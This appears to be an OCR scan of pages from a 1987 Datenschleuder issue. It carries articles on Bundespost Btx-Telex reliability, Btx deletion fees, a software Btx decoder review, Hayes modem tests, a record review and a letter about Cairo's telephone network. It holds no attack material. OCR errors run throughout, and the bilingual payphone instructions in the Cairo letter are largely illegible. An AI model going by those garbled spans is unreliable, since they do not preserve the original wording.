Der von der Post für ein Jahr angelegte Be¬ 
triebsversuch wurde im Mai ’87 begonnen. Btx- 
Teilnehmer können versuchen, über einen ex¬ 
ternen Rechner der Bundepost Telexe ins In- und 
Ausland zu versenden und auch von dort zu 
erhalten. 

Rund 600 Telexe werden zur Zeit täglich von der 
Post vermittelt. Der CCC stellte umgehend nach 
Betriebsbeginn die automatische Erstellung und 
Versendung von Gebührenbeschwerden auf den 
Btx-Telex-Dienst um. Vorher wurde dies übereinen 
Telexserver derGEONET- Mailboxsystemcin Eng¬ 
land abgewickelt. 

Da ein Telex als juristisches Dokument anerkannt 
wird, istZuverlässigkeit bei der Abwicklung solcher 
Server-Dienstleistungen ein wesentliches Krite¬ 
rium. Dieses kann bei dem Postangebot jedoch noch 
nicht erwartet werden. 

So gab die Redaktion am 11.05. gegen 14:41 ein 
Telex auf. Die Post quittiert die Eingabe mit der 
Ankündigung, daß in wenigen Minuten eine 
Versand- oder Fehlerbestätigung als Milteilung 
übersandt werde. Dies geschah jedoch erst über 17 
Stunden (!) später. Wie zeit- und gebUhrenaufwen- 
dige Recherchen ergaben, konnten aufgrund einer 
Störung im Datex-P Netz weder Absendebestäti- 
gungen für ordnungsgemäß zugestellte Telexe, noch 
Fehlermeldungen für nicht zugestellte Telexe an die 
Btx- Teilnehmer quittiert werden. Wesentlich 
schwerwiegender dürfte sich auswirken, daß durch 
denselben Fehler auch keine Mitteilungen über den 
Erhalt von Telexen versandt werden konnten. Das 
bedeutet, daß dasTelex gegenüber dem Absender als 
juristisch anerkannt zugesiellt gilt, obwohl der be¬ 
treffende Btx-Tcilnehmer keinen Hinweis auf den 
Telexeingang erhält. Nach Auskunft der zuständi¬ 
gen Dienststelle können weitere Ausfälle für die 
Zukunft nicht ausgeschlossen werden. 

Welche Folgen dadurch womöglich bei Terminge¬ 
schäften ausgelöst werden, kann sich jeder An¬ 
wender selber ausrechnen. 

Da fragt man sich, warum denn bei so einem “wac¬ 
keligen“ Betriebsversuch schon die vollen Gebüh¬ 
ren verlangt werden. Die Antwort ist einfach; die 

Seite 9 


Post nimmt lieber von Anfang volle Gebühren als 
sich später bei Einführung des Regeldienstes mit den 
Teilnehmern herumzuschlagen. Desweiteren muß 
der Dienst erst durch die Ferameldeordnung aner¬ 
kannt werden. Im Klartext: Wer als erster neue 
Dienste nutzt, zahlt auch das Lehrgeld für die Bun¬ 
despost und befindet sich juristisch auf sehr glatten 
Boden. 


LS23 

CLINCH/DS-RED/S.WERNERY/ 
17.05.87120:4512464 Znirhn 

Btx-Nepp 

Löschen ist gebührenpflichtig! 

Am heutigen Tage erhielt der CCC nach langen 
Bemühungen eines der begehrten Exemplare der 
Fernmeldeordnung (FO). Vielfach ist diese nicht 
mehr zu beziehen, da sie im Januar 88 durch die 
Telekommunikationsordnung (TKO) ersetzt 
wird. 

Bei genauem Studium der in der FO angegebenen 
Gebührenposten für Bildschirmtext wird erstmals 
eindeutig klar, daß auch das Löschen von Btx-Seiten 
durch den Anbieter gebührenpflichtig ist. Ange¬ 
rechnet wird widersinnigerweise die Gebühr für das 
Einarbeiten (!) von Btx-Seiten. 

Das Anbieterhandbuch en thält zu den B tx-Gebühren 
nureinen Hinweis auf die im Btx-Systemabrufbaren 
Übersichten. Dort im System sind im Informa¬ 
tionsteil (*104„ff) für Anbieter nur die Einarbei¬ 
tungsgebühren pauschal aufgeführt, wogegen in der 
GebührenUbersicht im Post-Programm (*20000„ff) 
auf das gebührenpflichtige Löschen versteckt hin¬ 
gewiesen wird. Die der Redaktion vorliegenden of¬ 
fiziellen Gebührenübersichten der Bundespost ent¬ 
halten keinen Hinweis auf die Kosten für das Lö¬ 
schen von Seiten. Lediglich derim Juni vergangenen 
Jahres an die Anbieter versandte Umstellungsplan 
enthält im Anhang einen entsprechenden Hinweis. 
Hier zeigt sich mal wieder, mit welch verworrenen 
(sich teilweise widersprechenden) Informationen 
die Btx-Anbieter über die tatsächlichen Gebühren¬ 
posten genarrt werden. 

Berechnet werden für das direkte Löschen von Sei¬ 
ten oder Blättern je Seite DM 0,10, wogegen das 
Löschen kompletter Seiten (a-z) sowie das Löschen 
ab Seite (laut Auskunft der Btx-NV) mitDM 0,05 je 
Seiie/BIatt berechnet wird. 

SinicnMjlcubcr 




Die Erhebung von Gebühren für das Löschen von 
Btx-Seiten grenzt nahezu an Betrug. Hinzu kommt, 
daß die Post es bisher nicht für nötig hielt, in ihren 
Gebührenübersichten (auch dem Anbieterhand¬ 
buch) auf diesen Umstand hinzuweisen. Denken Sie 
also daran, wenn ihnen die Umgangsformen der Post 
zum Hals raushängen und ihnen die Lust an der 
Teilnahme am Btx-Dienst vergangen ist, überlassen 
Sie das Löschen Ihres Angebotes der Post; das ist 
preiswerter! 


Bildschirmtext, 
jetzt mit *CHAOS» 

Zum 25J26. Juli ’87 änderte die Post die Sy¬ 
stemsoftware des Bildschirmtext Rechnerkübels. 
Neue Systemmerkmale bringen mehr komfort. 
Enischeident dürfte das neue Leistungsmerkmal 
der 'Alphanumerischen Suche’ sein. 


Bix-Red - LS23 



pmni 


Die Hacker Charts (II) 

1 Zero Leander 

KANN DENN HACKEN SÜNDE SEIN 

2 Freddy Quit 

EIN SHIFT WIRD KOMMEN 

3 Kraftwerk 
DAS MODEM 


So ist es mit *Anbietemame„ (Z.B. *CHAOS„) 
möglich einen Suchauftrag im Anbieterverzeichnis 
zu starten. Folgend wird, bei mehreren Angeboten 
(z.B. *Club„) eine Liste ausgegeben, bei nur einem 
Anbieter (wer hat sonst noch CHAOS im Namen) 
das Programm direkt aufgerufen. 

Die Btx-Redaktion des CCC läßt dementsprechend 
neue Suchbegriffe in das Anbieterverzeichnis cin- 
tragen (fernmündlich genehmigt). Neben der Suche 
nach Abkürzungen wie “CCC BHP CAC IPN bka“ 
erscheint die Übersicht des CCC auch bei dem Such¬ 
begriff HILFE. Nach langen Mühen mit den zu¬ 
ständigen Verwaltungsstellen der Post gelang sogar 
der Eintrag POST. Schon im Schlagwortverzeichnis 
war der CCC unter dem Begriff POST zu finden. 
Auch zukünftig erscheint der Name des Clubs neben 
denen der Postdienststellen. Ein sichtbares Zeichen 
der Ausgewogenheit im Bildschirmtextsystem. 

LS23 


4 Nena 

99 TELEFONS 

5 Marianne Rosenberg 
NUI DU ALLEIN 

6 Heintjc 
SYSOP SO LEB 

7 Manuela 

SCHULD WAR NUR DER DATENTRÄGER 

8 Datennetz-Kontrollchor 
der Deutschen Bundespost 

HOCH AUF DEM GELBEN HÖRNCHEN 

9 Geier Absturz 

DIE INTERDATIONALE 


art wo? 

Und wo bitteschön ist die Kunst? Eben nicht auf der 
Dokumenta, und eben auch nicht in den vielgc- 
rühmtcn 120 weissen qm Bus von -Dt. Schade. 
Ärgerlich aber: Was treibt den CCC in die Niede¬ 
rungen der Kasperltheater-Wirklichkeit einer Do¬ 
kumenta? DE Wirklichkeit braucht -Dt, um ihre 
Kunst als “Nase im Wind" und “Zukunflstechno- 
logie“ erscheinen zu lassen; aber was macht ein 
echtes Hackerteam in IHR? 

Darüber demnächst mehr, was ich an dieser Stelle 
auch nur angekündigt haben wollte, und verab¬ 
schiede mich für heute, nach China. 


A Peter Alexander 

HIER CRACKT EIN MENSCH 


Marina Kern 




LS blofeld 

SatcnSd/lciibcr 


Ä Marina bringt uns ein chinesisches Telefonbuch 
aus Peking mit; Anm.d.Red Ü 


Seite 10 


Stiftung Datentest 

Softwaredecoder fuer PCs 


Die Datenschleuder hat es schon vor Jahren pro¬ 
phezeit; mittlerweile gibtes eine ganze Reihe von 
Anbietern, die Softwarelösungen für 
Bildschirmtext-Anwendungen vorweisen kön¬ 
nen. Eines dieser Produkte nennt sich BTX-Term 
PC und wird von der Firma Stockem Compu¬ 
tertechnik, Lange Wende 33, in 4770 Soest, an- 
geboten. 

Für deutlich unter 300 DM erhält man einen DIN 
A5-Ringordner mit der Anleitung und zwei Dis¬ 
ketten mit Installations- und Treiberroutinen, sowie 
dem eigentlichen Softwaredecoder. Außerdem wird 
ein spezielles, umschallbares Serialkabel mitgelie¬ 
fert, das bei 50 % der Käufer Anlaß zur Erheiterung 
geben dürfte. Dazu später mehr. 

Es ist gewiß keine leichte Aufgabe, einen Softwa¬ 
redecoder für Bildschirmtexl zu entwickeln. Dafür 
sorgt schon der merkwürdige Pseudostandard, den 
sich die Post für die langsame Übertragung bunter 
Bildchen hat einfallen lassen. Entsprechend schwer 
haben sich die Porgrammierer lange Zeit getan. Das 
Unterfangen wird noch dadurch erschwert, daß es 
zwar einen Industriestandard für Personalcomputer 
gibt, dieseraber spätestens dann peinlich wird, wenn 
eben die bunten BTX-Bildchen dargestellt werden 
sollen. 

Stockem hat, nach anfänglichen Schwierigkeiten, 
den Großteil dieser lYobleme geläst. BTX-Term PC 
unterstützt alle gängigen Grafikkarten und holt her¬ 
aus, was herauszuholen ist. Unser Testrechner war 
ein Billigst-PC, made in Eile, mit Hercules-Grafik 
und V20-Chip. Dadurch waren die Probleme vor¬ 
programmiert. Um den Test noch weiter zu er¬ 
schweren, wurde ein Postmodem D 1200S-06 be¬ 
nutzt, da damit die größten Schwierigkeiten im prak¬ 
tischen Betrieb garantiert sind. Alternativ wurde ein 
Datenfohn S21/23D bereitgehalten, da klar war, daß 
es mit einem Postmodem so einfach nicht gehen 
würde. 

Wie unschwerzu ahnen ist, haben wir schlußendlich 
auch letzteren benutzt. Es kam uns zunächst darauf 
an, zu erfahren, wie die Software mit BTX umgeht 
und was man für Vorteile hat, wenn man sie statt 
eines TV-Decoders einsetzt. Beim Testrechner war 
Farbe nicht drin, umsomehr galt das Augenmerk der 

Seite 11 


Ersatzdarstellung auf dem HerculesScreen, der im¬ 
merhin die BTX-Auflösung locker schafft. Der 
Stockem-Decoder bewältigt die Aufgabe ganz gut, 
bis auf ein gelegentliches unmotivicncs Setzen des 
Invers-Attributs. Der Verdacht, daß dies sogar be¬ 
absichtigt ist, drängt sich angesichts der'Regelmä- 
ßigkeit des Fehlers auf, ein Sinn kann jedoch nicht 
gefunden werden. Da es den meisten Anwendern 
weniger auf die Grafik, als auf einen sauberen Text¬ 
aufbau ankommen dürfte, kann man dieses Manko 
getrost vergessen. 

Als Ausgleich bietet das Programm die Möglichkeit, 
die dargestellten Seiten sowohl als reine ASCII- 
Datei, als auch als Grafik abzuspeichern und aus¬ 
zudrucken. Umgekehrt kann man beliebige extern 
erstellte Texte an das BTX-System senden, der 
Nachrichtenaustausch wird also auf Techniken er¬ 
weitert, die man von anderen Medien wie Mailboxen 
schon kennt und schätzt. Daruberhinaus bietet das 
Programm die Möglichkeit, in einem ’Learn’- Mo¬ 
dus festgelegte Befehlsfolgen abzumfen. Man kann 
so z.B. den Ausdruck seines Kontoslandes auto¬ 
matisieren, wenn man BTX-Kontenführung macht. 
Darüberhinaus gibt es noch einigen Schnick¬ 
schnack, der weniger interessant ist, vielleicht mit 
Ausnahme der Möglichkeit, resident ins DOS zu 
gehen, ohne daß derBTX-Dialog abgebrochen wird. 
Leider funktioniert das ganze nicht so weit, daß man 
im DOS einen Text editieren und gleichzeitig den 
Kontostand abfragen kann, aber solche Probleme 
löst man ohnehin besser mit entsprechenden Be¬ 
triebssystemen. 

Den größten Minuspunkt erhält das Programm für 
den Kopierschutz, der einfach nicht mehr zeitgemäß 
ist. Dieser verbirgt sich als Hardwarezusatz in der 
unvollständig konfigurierten und viel zu kurzen Se¬ 
rialleitung, die mitgeliefert wird. Das mutet eher 
rührend an, denn welche Möglichkeiten gibt es 
schon, ohne Beeinträchtigung der Funktion am Se¬ 
rialport zu manipulieren, wenn man ohnehin schon 
einiges verbiegen muss, um die 1200/75 Baud zu 
realisieren, und nur eine beschränkte Zahl von Ein- 
Ausgabeleitungen hat. 

goblin 

btxier22.ds 19870630 2200 

PS: Ein Hinweis nach Redaktionsschluß; Commo- 
dore will zur EA 10.000 BTX-Sleckmodule (In¬ 
nenleben von Siemens) für unter 400 DM anbieten. 
Das sagte Commodore allerdings auch schon auf der 
letzten EA. 

Sxitcncidtlnbcr 



To DFÜ or not to DFÜ 

Von einem der auszog ein Hayes-Modem zu 
kaufen. 


Unser Normaluser M. Umpitz (Name von der 
Redaktion geändert) begab sich also auf die Su¬ 
che nach einem schnelleren Modem, um die Ko¬ 
sten pro ausgelesenem Byte zu senken. Daß der 
Computer dieses Herrn keine FZZ-Nr. hat und 
daher die Post dort keines ihrer 1200BpS- 
Modems anschließt, brachte den Herrn auf die 
Idee, sich ein Hayes-kompaktibles Modem zu¬ 
zulegen. 


Um das Ende der Geschichte gleich vorweg zu neh¬ 
men: Keines der getesteten Modems war ohne Mac¬ 
ken. Nicht ein einziges hat sich komplett an diesen 
sogenannten Hayes-Standart gehalten. 


Erklärung für Neulinge: 

Ein Hayes-Modem wird normalerweise direkt an die 
RS232-Schnittstelle angeschlossen. Es gibt auch 
PC-Karten, die die RS232 mit ersetzen. Alle Ko- 
mandos bis auf eines fangen mit einem großge¬ 
schriebenen “AT“ an. Sie starten also ihr Termi¬ 
nalprogramm, stellen es auf die gewünschte Bau¬ 
drate ein, und können nun ihre Komandos eingeben. 
(Einige Modems haben auf der Platine ein paar 
Schalter, die müssen vorher noch eingestellt wer¬ 
den). Man unterscheidet den Komando-Modus, in 
dem Befehle eingegeben werden können und den 
Online-Modus, wärenddas Modem die Verbindung 
jnit einem anderen hat. Die Hayes-Modems haben 
den Vorteil, daß das Eingeben der Komandos über 
Schnittstelle geschieht. Man braucht also nicht ge¬ 
zielt irgendwelche Pin’s an der Schnittstelle zu set¬ 
zen, um auch gezielt wählen zu können. 


Modem: WD-1600c 

Generalvertrieb: PIM Computer AG, Schweiz 
Wertung: Vom Kauf abzuraten 
Besonderheiten: Telephonhörer wird mitgeliefert 
Begründung: Alles scheitert am Terminal-Escape- 
Character. Bei einem normalen Hayes-Modem muß 
erst eine gewisse Zeit gewartet werden, dann gibt 
man ihm dreimal ein “wartet wieder“ und ist im 
Komandomodus (ohne aufgelegt zu haben). Dieses 
Modem hat das nicht nötig. Sofort, wenn dieser 
Character übertragen wird, legt es auf und ist im 
Komandomodus. Wenn sie “ATS2=255“ sagen, um 
die Übertragung transparent zu schalten, kann das 
Ding nach dem Wählen den Carrier nicht mehr 
erkennen. Binärdateien können also mit diesem Mo¬ 
dem nicht übertragen werden. Auch eine anständige 
Carrier-Erkennung im Autoanswer-Modus bringt 
das Dingnicht zustande. DerDTR-Pin, mit dem man 
Sn/ciiäif^Icuhcr 


das Modem noiiii;,..u.'x.zum Reset bringen kann, 

wird komplett ignoriert u.s.w. 

Modem: WELCOM 
Generalvertrieb: Nicht auszumachen 
Wertung: Unter Umständen brauchbar 
Besonderheiten: Wenige DIP-Switshes 
Begründung: Hängt sich manchmal aus unerklärli¬ 
chen Gründen mitten während der Übertragung auf. 
Hängt sich auf, wenn während der Komandoeingabe 
ein Anruf erkannt wird. Benutzt zur Baudratener¬ 
kennung bei einem Anruf einen 600 Carrier, auf den 
manche Modems nicht antworten, und schickt auch 
keinen 21 OOHz-Ton vorweg. Die ersten beiden Feh¬ 
ler sollen durch ein neues Eprom beseitigt seien 
(Händler treten!). Was mit den anderen ist. 

Modem: UGHTSPEED 1200 
Generalvertrieb: M.PJ., Aachen 
Wertung: Bestes Modem im Test 
Besonderheiten: Scheisse Billig 
Begründung: Bis jetzt nureine Macke bei dem neuen 
Eprom, das derzeit ausgeliefert wird. Das Alte soll¬ 
ten sie wegwerfen (wiedermal kräftig den Händler 
treten). Bei dem Neuen wird kein Carrier erkannt, 
wenn man das Busy-Signal abfragt (“ATX3“) und 
die Mailbox keinen 2100Hz-Ton sendet. Wenn man 
das wegläßt: ganz prima. Wird bei Dauerbetrieb ein 
wenig zu warm. Hat für Begriffsstutzige noch eine 
Kurzanleitung, die das Modem an die Schnittstelle 
überträgt (nette Spielerei). Sendet bei .‘knruferken- 
nung zuerst einen 21 OOHz-Ton und schaltet dann 
immer zwischen 300- und 1200-Baud Carrier um, 
also ganz korrekt. 

Modem: GVC 1200 

Generalvertrieb: Resco, Augsburg 

Wertung: Viel zu teuer für die Leistung die gebracht 

wird 

Besonderheiten: keine 

Begründung: Schwierigkeiten mit der Anruferken¬ 
nung. Die Firma liefen, obwohl sie zur Cebit schon 
ein neues Eprom hatte, zweieinhalb Monate danach 
immer noch Modems mit dem alten Eprom aus. 
2KXlHz vorweg fehlt. Ansonsten gut zu gebrauchen. 
Modem: GVC 300 
Generalvertrieb: Resco, Augsburg 
Wertung: Von Kaif abzuraten 
Besonderheiten: Nur 300 Baud maximal 
Begründung: Scheint die Eigenheit zu haben, öfters 
kaputt zu gehen (Drei Stück in einem Monat ist wohl 
nicht mehr normal!). Kann nur 300 Baud. Wenn - 
während das Modem einen Anruf erkannt hat und er 
den 2 lOOHz sendet - ein Carrier anliegi, erkennt das 
Modem diesen nicht. Also immer erst nach dem 
2I00Hz-Ton senden. Überhaupt ein Witz, für 300 

Seite 12 


Baud soviel Kohle zu verlangen. Wenn schon illegal 
denn schon richtig. 

Modem: PC Link 

Generalvertrieb: GVM, Düsseldorf 
Wertung: Unter Umständen brauchbar 
Besonderheiten: Modembox für MDB 1200-3,teuer 
aber das sind die Modemboxen alle, FZZ-Zulassung 
Begründung: Keine Spaces zwischen den Koman¬ 
dos erlaubt. Kein Hardware-Handshake bei 12(X)/75 
Baud, daher Pufferüberlauf möglich. Reagiert im 
Hayesmodus bei der Anruferkennung allergisch auf 
gewisse Koppler (Epson z.B.). Die Login-Meldung 
konunt deshalb nur verstümmelt an. Sonst keine 
Probleme. Der Dealer wollte uns auch erst nicht 
glauben, aber wir haben ihn eines Besseren belehn. 

Wir fordern endlich anständige Hayes- 
Modems!! 

Wir fordern hiermit jeden Herstellerauf, der was auf 
sich hält, uns so ein Ding mal für eine Woche zu 
leihen, damit wir es testen können. Wir sind zu 
erreichen in der lUS-Mailbox 0203/596245, an 
“Hackowiz“, oder per Snailmail an Postlagerkar- 
te;056945 B, 4100 Duisburg 1 

Hackowiz 

CUNCH/SYSOPIGAST/06.07.87/19:28/5621 

Radio K.A.O.S. 

Wie man Perlen vor die Säue wirft 


“This is K.A.O.S.. You and I are listening to 
KAOS in Los Angeles. Let’s go to Ihe telcphonc 
now and take a requesl.“ 

So beginnt das neueste Epos von Roger Waters, dem 
Mann, der dafür sorgte, daß Pink Floyd hart am 
Mainstream vorbei zur Kultband wurde und den 
experimentellen Exzessen von Sid Barrel & Co 
Grenzen setzte. Der Plot ist schnell nacherzählt: Der 
autistische Protagonist gelangt in den Besitz eines 
drahtlosen Telefons, das er zusammen mit seinem 
Bruder aus dem eingeschlagenen Schaufenster des 
Electronic-Shops geklaut hat und erschliesst sich 
damit das globale Dorf, knüpft Kontakte zu Com¬ 
putern in aller Welt und spielt sein eigenes Star- 
Wars, nicht ohne vorher dafür gesorgt zu haben, daß 
nichts passieren kann. Seine Aktion wird zum Aus¬ 
löser für die Menschheit, derri atomaren Wahnsinn 
ein Ende zu setzen. 

Saite 13 


Diese verkürzte Darstellung macht deutlich, daß hier 
gleich ein halbes Dutzend interessanter Themen ver¬ 
schenkt wurden. Musikalisch zwischen ’Dark Side 
of the Moon’, ’When the Wind blows’ und anderen 
Endzeit-Dramen angesiedelt, verpasst Waters die 
Gelegenheit, sich kritisch mit den neuen Techno¬ 
logien und ihren Auswirkungen auseinanderzuset¬ 
zen. Erschreckenderweise bleibt die Platte hörbar, 
was für die Qualitäten des Musikers Walers spricht, 
dem der Dramaturg Waters das Wasser nicht reichen 
kann. 

Man kann sich des Gefühls nicht erwehren, daß hier 
versucht wurde, nachzuholen, was seit zehn Jahren 
versäumt worden ist. Fairlight, Emulator, Syncla- 
vier, Wave Generator und wie sie alle heissen, die 
Superstar-Aggregate der 80er Jahre, eingesetzt von 
Leuten, die nichts Besseres damit anzufangen wis¬ 
sen, als 'Miami Vice’ in Töne zu setzen, sind nur 
Symptone für eine Geisteshaltung unter den Mu¬ 
sikschaffenden, die im Wesentlichen den kommer¬ 
ziellen Aspekt sehen, wenigerden künstlerischen. 

Womit die notwendige Brücke geschlagen wäre, zu 
der Frage, was der Quatsch in der DATEN¬ 
SCHLEUDER zu suchen hat: Dem geneigten (ca. 72 
Grad) Leser wird nicht entgangen sein, daß hier 
Parallelen zu dem Artikel 'Art wer ?’ in DATEN¬ 
SCHLEUDER 19 gezogen werden können. Wenn 
Kunst & Computer für uns ein Thema ist, dann 
Musik & Computer erst recht. Wir werden uns künf¬ 
tig etwas mehr damit beschäftigen. Und gerade das 
erwähnte Produkt aus der Stimmungsfabrik Waters 
ist idealer Ansatzpunkt fürdie Frage: 'Wie konnte es 
soweit kommen ?’ Dazu in späteren Ausgaben mehr. 
Klappe, Schnitt, und ab ins Kopierwerk. 


goblin 

CUNCHIDATENSCHLEUD ER -RED! 
SYSOP/03.07.87/23:36/2416 Zeichen 



Snfcnörfjlcubcr 





Das Globale Dorf 


Ein Brief aus Kairo 


Liebe Freunde, als ich unlängst von Athen nach 
Kairo flog, saß ein japanischer Geschäftsmann 
neben mir. Wie sich im Gespräch herausstellte, 
vertritt er in der ägyptischen Hauptstadt ein ja¬ 
panisches Unternehmen. Auf die Frage, was er in 
Athen gemacht habe und wie lange er dort ge¬ 
wesen sei, antwortete er: “Ich war nur für ein 
paar Stunden da, ummitmeinerFrau und meiner 
Firma in Japan zu telefonieren. Kairo ist nämlich 
die Stadt der toten Telefone.“ 

Von Kairo ins Ausland zu telefonieren ist in der Tat 
so gut wie unmöglich. Wer es trotzdem versucht, 
bekommt vom Fräulein vom Amt die Auskunft, daß 
die Wartezeit zwei bis drei Tage beträgt. Meist 
wartet man jedoch vergeblich. In Kairo wird schon 
der Versuch, von einem Nilufer ans andere zu tele¬ 
fonieren, zur Geduldsprobe. 

Kairo ist zwar mit fast zehn Millionen Einwohnern 
die größte S tadt Afrikas, es gibt aber nuretwa 80.000 
Telefonanschlüsse. Das behauptet zumindest das 
zuständige Ministerium für Kommunikation. Wie 
viele von den vorhandenen Anschlüssen tatsächlich 
funktionieren, weiß allerdings kein Mensch zu sa¬ 
gen. An Apparaten herrscht offenbarkein Mangel. In 
Geschäften, Büros und komfortablen Wohnungen 
befindet sich fast immer ein häßliches schwarzes 
Telefon. Wenn man danach fragt, ob man es mal kurz 
benützen dürfe, dann erhält man fast immer die 
Antwon: “Im Moment geht es leider nicht“. Was die 
liebenswürdigen Ägypter als Moment bezeichnen, 
das kann in Wirklichkeit eine Zeitspanne von Wo¬ 
chen, Monaten oder Jahren sein. 



Als ich in Kairo einmal auf Wohnungssuche ging, 
machte ich'dem Makler von Anfang an klar, daß ich 
als Journalist auf ein Telefon angewiesen sei. Das 
sah er auch ein. Ais wir tagelang von ihm ausge- 
kundschaftcte Wohnungen besichtigten, stürzte ich 
mich immer sofort auf das Telefon, das - wie ver¬ 
sprochen - auch vorhanden war. Die Hälfte der 
ausprobienen Apparate war jedoch tot. “Das kann 
nur einen Moment dauern“, versuchte der Makler zu 
trösten - ein schwacher Trost. 

SnfcnSdjIcuhcr 


Ct-br<]uchiartu«(äurig i/ef 
i-ifniprochjfllcn in 

^ j 

iiiä'i tit.tülefonä't fi iiiuBr 

I. Kiiic .MUiuv 2 u 1 1‘luatrr in 

slvvki.'ii f*j J" llutt 

UüY ßl-chii'riu 

Heil Ilürer ukiivliuivii und diu 
Nuuiiuer uülitvii jü. 

ebuJti uQ-Üaiii'iiiä'^a cjida'<i>*<ja.r en-iii'iura 
ul-ma4lü'ba 

Ü. Subulü der ‘J'eiliieliiiier uiilivortct, auf den 
Knopf drücken ka«! .iLk .>^L 

biimiga'r md ina jiru'iid ^alck cl-iiiuUka'l- 
lini i'dyat ‘'as-ui'rr 

4 . Wenn die (jeMÜiiaelile Niiiiiiner beseliil Kl, 
den Iliirer wieder uuileyeii und den knüpf 
drUckeii. l>le Mtiiiae fällt von üelbsl lirruus 
U- i»i j j äjI .—n Jfc». ji.^ir ji 1 

in kä'jiiL en-ni'iiira fi «—^ ÄJL^l kä-J / 
inaacliYii’Ia.hutteO'ßam-mi'^ft niahttMe'ha 
turdyat ‘•aa- ai'rr ti'ß’at el-^u‘mle iiiiii 
iiafQu'lia 


Das Kairoer Telefonnetz wurde vor dem zweiten 
Weltkrieg von einer britischen Firma gelegt. Seither 
geschah so gut wie nichts mehr. Die Leitungen 
wurden nie mehr überprüft, instand gesetzt oder gar 
erneuen. Das Won Instandhaltung ist den Ägyptern 
völlig unbekannt. Dies trifft übrigens nicht nur auf 
Telefone zu, sondern auch auf Aufzüge, Autos und 
andere technische Anlagen, Solange sie funktio¬ 
nieren, sind die Ägypter glücklich und zufrieden. 
Wenn siekaputtgegangen sind, dann waresein böser 
Streich Allahs, der mit ein paar kräftigen Haramer- 
schlägen oder einem Stück Klebestreifen behoben 
wird. Im Ministerium oder beim Kairoer Fernmel¬ 
deamt scheint jedenfalls nie jemand dran gedacht zu 
haben, daß die Telefonleitungen aus billigem Vor- 
kriegsmaterial im Laufe der Jahrzehnte mürbe und 
emeuerungsbedürftig werden könnten. Manche be¬ 
haupten sogar, daß inzwischen niemand mehr weiß, 
wo die Kabel liegen. Fest steht jedenfalls, daß viele 
Leitungen in Abwässerkanäle abgesackt sind und 
unbrauchbar wurden. Andere sind von Ratten und 
Mäusen im Kairoer Untergrund angenagt und still¬ 
gelegt worden. 

Auch wenn man von Telefontechnik nichts versteht, 
dann sagt einem ein Blick in einen Kairoer Kabel¬ 
schacht - die dazugehördenden Eisen- oder Beton¬ 
deckel sind längst gestohlen worden - alles, worüber 
man sich oft gewundert hat. Er ist fast immer mit 
Abwässern und Abfällen voll. Dazwischen befindet 
sich eine bunte Vielfalt von dünnen Drähten. Nicht 
einmal die Techniker des Telegrafenamtes, die sich 


Seite 14 


gelegentlich in solchen Schächten zu schaffen ma- Das bruchstückhafte Fernsprechnetz hat nur eine 
Chen, scheinen zu wissen, wie dieser Drahtverhau gute Seite. Man hat immer eine glaubhafte Ausrede 
zusammengehört. Diese Techniker sind übrigens in 2 ur Hand, wenn man Leuten aus dem Weg gehen 
Kairo äußerst gefürchtet. Wenn siees nämlich schaf- will, und die Abschicdsfloskel “Wirrufen uns in den 

feii, einen gestörten Anschluß instand zu setzen, näch.sten Tagen an“ ist nicht ernst gemeint, 
dann legen sie bei dieser Arbeit zehn andere lahm. Herzlichst Ihr W. Stockklausner 
“Wenn sie wieder anrücken, dann sind schon hundert 
Telefone tot“, erklärt ein Kairoer Telefonbesitzer, 

dessen Apparat noch funktioniert. (aus: Franl^urter Rundschau, 135.78) 


Tod kam mit dem Telefon 
AFP, Kairo 

Aus Freude dariiber, daß er nach 15 
^ Jahren endlich den beantragten Tele- 
ronanschtuß erhalten sollte, ist ein 50 
Jahre alter Ägypter am Samstag an 
c.' einem Herzschlag gestorben. Die Kai- 
roer Presse berichtete, der Musiker 
^ Adel Atteya Mostafa sei beim Unter- 
.5 schreiben des Anschlußformuiars 
plötzlich tot zusammengebrochen. 

Die Kairoer Telefonmisere kostet Nerven und nicht 
zuletzt Zeit. In Geschäften, Büros und Banken ver¬ 
bringen die Angestellten manchmal Stunden damit, 
eine einzige Nummer anzurufen. Sie sitzen vor dem 
Telefon, blicken verträumt aus dem Fenster und 
warten auf den erlösenden Summton, der eine freie 
Leitung verspricht. Andere trommeln ununterbro¬ 
chen wütend auf den Apparat und glauben, daßsie 
damit mehr erreichen. Hat man als Kairoer Tele- 
fonbenützer endlich ein Freizeichen erhalten, dann 
beginnt eigentlich erst der richtige Nervenkitzel. 
Nun muß sich nämlich heraussteilen, ob der Apparat 
des Teilnehmers funktioniert, den man erreichen 
will. Vielleichi ist er auch besetzt oder es meldet sich 
ein anderer Teilnehmer, weil der Anschluß bei einer 
Reparatur vertauscht wurde. 

Nach meinen Erfahrungen spielt sich der Versuch, in 
Kairo jemanden telefonisch zu erreichen, so ab: Ich 
wähle die Nummer zwanzig mal. Dazu brauche ich 
zwei Stunden, weil das Freizeichen auf sich warten 
läßt. Bei zehn Wäehlversuchen tut sich nichts, bei 
sieben anderen enönt das Besetztzeichen. Dreimal 
meldet sich ein falscher Teilnehmer. Ich gebe auf, 
setze mich ins Taxi und fahre durch den chaotischen 
Kairoer Verkehr zu meinem Gesprächspartner. 

Viele ägyptische und ausländische Firmen verzich¬ 
ten inzwischen auf die Dienste des Telefons. Sie 
beschäftigen Boten, die schriftliche Nachrichten 
überbringen und mit der Antwort zurückkommen. 
Damit sie nicht im Verkehrsgewühl so leicht stec¬ 
kenbleiben, werden sie mit Fahnädem oder Mopeds 
losgeschickt. 


Hicom im bundesdeutschen 
Polizeinetz 


Wie die SIEMENS Pressestelle mitteilt wur¬ 
de jetzt im Landesnetz der Polizei Baden- 
Würtemberg im Polizeirevier Künzelsau das 
erste Kommunikationssystem Hicom ais 
Endvermittlungsstelle im Fernsprechorts¬ 
netz der Polizei in Betrieb genommen. Drei 
weitere Hicom-Systeme für die Polizeire¬ 
viere in Geislingen, Kirchheim und Felibach 
gehen in Kürze in Betrieb. 

Alle vier Anlagen stattet Siemems mit einem Ge¬ 
bührencomputer zur Gesprächsdatenerfassung und 
-auswertung aus. Privatgespräche werden nach der 
Wahl einer Kennzahl gesondert erfaßt und abge¬ 
rechnet. 

Das vom öffentlichen Nachrichtenverkehr unab¬ 
hängige Fernsprechsondernetz der Polizei in der 
Bundesrepublik Deutschland dient vor allem der 
polizeiinternen Nachrichtenübertragung zwischen 
den Polizeien der Länder, dem Bundeskriminalamt, 
dem Bundesgrenzschutz sowie den Behöreden, 
Diensstellen und Beamten (!) des Bundes und der 
Länder, die mit Polizeiaufgaben betraut sind. Die 
Landesnetze dieses Sondemetzes gliedern sich je¬ 
weils in Vierdraht-Knotenvermittlungen und Ne¬ 
benstellenanlagen als Endvermittlungen. Diese 
